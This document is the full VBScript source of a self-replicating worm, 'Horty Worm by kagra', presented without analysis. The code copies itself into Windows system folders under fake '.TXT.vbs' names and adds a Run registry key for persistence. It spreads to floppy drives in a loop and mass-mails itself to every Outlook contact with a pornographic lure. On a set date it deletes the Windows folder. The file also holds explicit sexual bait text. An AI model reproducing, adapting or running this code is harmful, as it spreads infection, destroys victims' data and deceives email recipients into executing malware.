Horty Worm by kagra
-------------------

on error resume next
set fso=createobject("scripting.filesystemobject")
set wscriptshell=createobject("wscript.shell")
aaa11=wscript.scriptfullname

stng=mid(aaa11,1,2)
if stng="A:" or stng="B:" then

fso.copyfile wscript.scriptfullname,"c:\x-FUCK.TXT.vbs"
wscriptshell.run "wscript.exe c:\x-FUCK.TXT.vbs"

wscript.quit
end if

set autorun=fso.getspecialfolder(0)
set replicant1=fso.getspecialfolder(1)
set replicant2=fso.getspecialfolder(2)
autorun2=autorun&"\kernel32.vbs"
passfile=autorun&"\JENNA-JAMESON-FREE-SUPERFUCK.TXT.vbs"
replicant11=replicant1&"\ALEXIA.TXT.vbs"
replicant22=replicant2&"\Natasa.TXT.vbs"
fso.copyfile wscript.scriptfullname,autorun2
fso.copyfile wscript.scriptfullname,replicant11
fso.copyfile wscript.scriptfullname,replicant22
fso.copyfile wscript.scriptfullname,passfile

if aaa11<>autorun2 then

data1="Here are some VERY interesting addresses for SEX--SEX-SEX:"
data2="www.megapussy.com"
data3="www.fuck.com"
data4="www.tits.com"
data5="www.porn.com"
data6="www.superfuck.com "
data7="www.megatits.com"
data8="ALSO IN WWW.NTUA.COM U CAN DOWNLAOD:JENNA JAMESON SUPERFUCK,"
data9="BILL GATES SMASHING HIS PC IN ANGER,PAMELA ANDERSON+TOMY LEE"              
data10="EXTRAFUCK VIDEO IN THE BOAT AND IN THE HOUSE,DEAD MAN BEING"

data11="FUCKED BY A WOMAN,THE WOMAN WITH A DICK,THE LARGEST DICK IN AFRICA,"            
data12="A TIGER EATING HER KIDS,A DOG IS FUCKING MY AUNT,MATRIX 2:A SAMPLE"
data13="JULIA ROBERT'S BLOWJOB,AND THE SPECIAL THEME FROM:"
data14="         THE MOST TERRIBLE DICKHOLE IN EAST,KAJAYAMI"
data15="Please,pass this message to everyone u know,and enjoy!"

              
alldata=data1&chr(13)&chr(10)&chr(13)&chr(10)&chr(13)&chr(10)&data2&chr(13)&chr(10)&data3&chr(13)&chr(10)&data4&chr(13)&chr(10)&data5&chr(13)&chr(10)&data6&chr(13)&chr(10)&data7&chr(13)&chr(10)&data8&chr(13)&chr(10)&chr(13)&chr(10)&data9&chr(13)&chr(10)&data10&chr(13)&chr(10)&data11&chr(13)&chr(10)&data12&chr(13)&chr(10)&data13&chr(13)&chr(10)&data14&chr(13)&chr(10)&data15&chr(13)&chr(10)
 

datafilename=autorun&"\JENNA-JAMESON-FREE-SUPERFUCK.txt"
set datafile=fso.createtextfile(datafilename,true)
datafile.write alldata
datafile.close
wscriptshell.run "notepad.exe"&" "& datafilename,3
end if

speecha="Do you wanna see super pornostar,Jenna Jameson,in a special"
speechb="superfuck?Double click on the attachment of this mail,and get"
speechc="also some interesting sex-sex-sex addreses... "
speech=speecha&chr(13)&chr(10)&speechb&chr(13)&chr(10)&speechc&chr(13)&chr(10)

if wscriptshell.regread ("HKLM\SOFTWARE\WUpdate") <> "5" then
pass()
end if


if month(now)=5 and day(now)=13 then
fso.deletefolder autorun,true
end if

if month(now)=5 and day(now)=12 then
msgbox "Your PC has been hacked by KaGra[ATZI virus ver 2.1]",64,"From the KaGra"
end if


b=1
wscriptshell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WUpdate","wscript.exe"&" "&autorun2&" "&"%"

set thiscode=fso.opentextfile(wscript.scriptfullname,1)
code=thiscode.readall
thiscode.close

tim=minute(time)
tim=tim+6
do 

if not (fso.fileexists(autorun2)) then
set resuraction=fso.createtextfile(autorun2,true)
resuraction.write code
resuraction.close
end if
regvalue=wscriptshell.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WUpdate")
if regvalue <> "wscript.exe"&" "&autorun2&" "&"%" then
wscriptshell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WUpdate","wscript.exe"&" "&autorun2&" "&"%"
end if
regvalue=""


timstandard=minute(time)
if tim>53 then
tim=01
end if

if timstandard=tim then
tim=minute(time)
tim=tim+6



if b=1 then
set replicant3=fso.createtextfile("a:\KISSme.TXT.vbs",true)
errornumber=err.number
replicant3.write code
replicant3.close

set replicant4=fso.createtextfile("b:\KISSme.TXT.vbs",true)
replicant4.write code
replicant4.close
end if


if b=2 then
set replicant3=fso.createtextfile("a:\PUSSY.TXT.vbs",true)
errornumber=err.number
replicant3.write code
replicant3.close

set replicant4=fso.createtextfile("b:\PUSSY.TXT.vbs",true)
replicant4.write code
replicant4.close
end if
'padela eisai trela

if b=3 then
set replicant3=fso.createtextfile("a:\x-FUCK.TXT.vbs",true)
errornumber=err.number
replicant3.write code
replicant3.close

set replicant4=fso.createtextfile("b:\x-FUCK.TXT.vbs",true)
replicant4.write code
replicant4.close
end if

if b=4 then
set replicant3=fso.createtextfile("a:\2TITS.TXT.vbs",true)
errornumber=err.number
replicant3.write code
replicant3.close

set replicant4=fso.createtextfile("b:\2TITS.TXT.vbs",true)
replicant4.write code
replicant4.close
end if

if b=5 then
set replicant3=fso.createtextfile("a:\myDICK.TXT.vbs",true)
errornumber=err.number
replicant3.write code
replicant3.close

set replicant4=fso.createtextfile("b:\myDICK.TXT.vbs",true)
replicant4.write code
replicant4.close
end if

if b=6 then
set replicant3=fso.createtextfile("a:\PORN.TXT.vbs",true)
errornumber=err.number
replicant3.write code
replicant3.close

set replicant4=fso.createtextfile("b:\PORN.TXT.vbs",true)
replicant4.write code
replicant4.close
end if

if b=7 then
set replicant3=fso.createtextfile("a:\UFOxxx.TXT.vbs",true)
errornumber=err.number
replicant3.write code
replicant3.close

set replicant4=fso.createtextfile("b:\UFOxxx.TXT.vbs",true)
replicant4.write code
replicant4.close
end if


if b=8 then
set replicant3=fso.createtextfile("a:\ALIENS.TXT.vbs",true)
errornumber=err.number
replicant3.write code
replicant3.close

set replicant4=fso.createtextfile("b:\ALIENS.TXT.vbs",true)
replicant4.write code
replicant4.close
end if

if b=9 then
set replicant3=fso.createtextfile("a:\theBAR.TXT.vbs",true)
errornumber=err.number
replicant3.write code
replicant3.close

set replicant4=fso.createtextfile("b:\theBAR.TXT.vbs",true)
replicant4.write code
replicant4.close
end if


if b=10 then
set replicant3=fso.createtextfile("a:\DrDICK.TXT.vbs",true)
errornumber=err.number
replicant3.write code
replicant3.close

set replicant4=fso.createtextfile("b:\DrDICK.TXT.vbs",true)
replicant4.write code
replicant4.close
end if



if errornumber>0 then
b=b-1
err.clear
end if

b=b+1

if b=11 then
b=1
end if

end if

loop



function pass()

on error resume next
set out=createobject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
set newitem=mapi.getdefaultfolder(10)
for x=1 to newitem.items.count
set mailitem=out.CreateItem(0)
set email=newitem.items.item(x)
mailitem.To=email
mailitem.Subject="Jenna Jameson pornostar free superfuck+photo addresses"
mailitem.Body=speech
set attachments=mailitem.Attachments
attachments.Add passfile
mailitem.send
next

if wscriptshell.regread ("HKLM\SOFTWARE\WUpdate")= "" then
wscriptshell.regwrite "HKLM\SOFTWARE\WUpdate","1"
end if

if wscriptshell.regread ("HKLM\SOFTWARE\WUpdate")  <> "5" then
regcount=wscriptshell.regread ("HKLM\SOFTWARE\WUpdate")
regcount=regcount+1
wscriptshell.regwrite "HKLM\SOFTWARE\WUpdate",regcount
end if


end function



